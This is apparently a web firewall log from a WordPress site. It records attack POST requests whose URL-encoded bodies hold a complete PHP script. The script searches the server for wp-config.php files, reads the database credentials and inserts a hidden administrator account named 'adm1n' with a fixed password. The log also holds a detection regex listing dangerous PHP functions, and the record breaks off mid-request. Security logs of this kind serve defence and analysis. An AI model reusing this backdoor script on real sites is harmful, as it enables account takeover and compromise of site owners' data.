%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/99.0.4844.51 Safari\/537.36 Edg\/99.0.1150.30\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMytvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaWdqKA0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\naccept:*\/*\naccept-encoding:gzip,deflate\nupgrade-insecure-requests:1\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Microsoft Edge\";v=\"99\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\ncontent-length:12640\n\nfX=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 06:03:29","213.209.159.254","POST","\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Ai:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php HTTP\/1.1\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-user:?1\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncookie:4=e367ba33cbb513d4c0b57eb3026dd8cc; 